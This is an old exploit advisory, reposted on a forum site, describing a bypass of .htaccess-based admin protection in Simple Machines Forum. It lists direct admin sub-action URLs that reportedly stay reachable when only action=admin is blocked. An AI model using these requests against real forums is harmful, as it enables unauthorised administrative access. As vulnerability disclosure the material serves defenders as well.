Home » Simple Machine Forum [ALL Versions] SMF .htaccess bypass

Simple Machine Forum [ALL Versions] SMF .htaccess bypass

Enviado por OeX el Ma, 06/11/2007 - 20:17.
autor: 
Seph1roth
http://www.blackroots.it
# ./start
#
# Discovered by Seph1roth on June 2007 (was priv8)
#
# Vulnerable: Simple Machine Forum [ALL Versions]
#
# Visit: http://www.blackroots.it - Best hacking site.
#
# Description:

If smf has index.php?action=admin in .htaccess ,i can bypass that by typing in the
url some variable of administration panel :

example:

index.php?action=admin (.htaccess,then access denied)
index.php?action=membergroups (accessible)
index.php?action=news (accessible)
index.php?action=featuresettings (accessible)

...and others...

i can bypass and enter the administration by typing the accessible variables in the
url...

# Greets to all BlackRoots Users
#
# Shoutz to all kiddies
#
# ./end
  • 7896 lecturas

Responder

  • Saltos automáticos de líneas y de párrafos.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <img> <p> <br>
  • You may post code using <code>...</code> (generic) or <?php ... ?> (highlighted PHP) tags.

Más información sobre opciones de formato

CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
Image CAPTCHA
Copy the characters (respecting upper/lower case) from the image.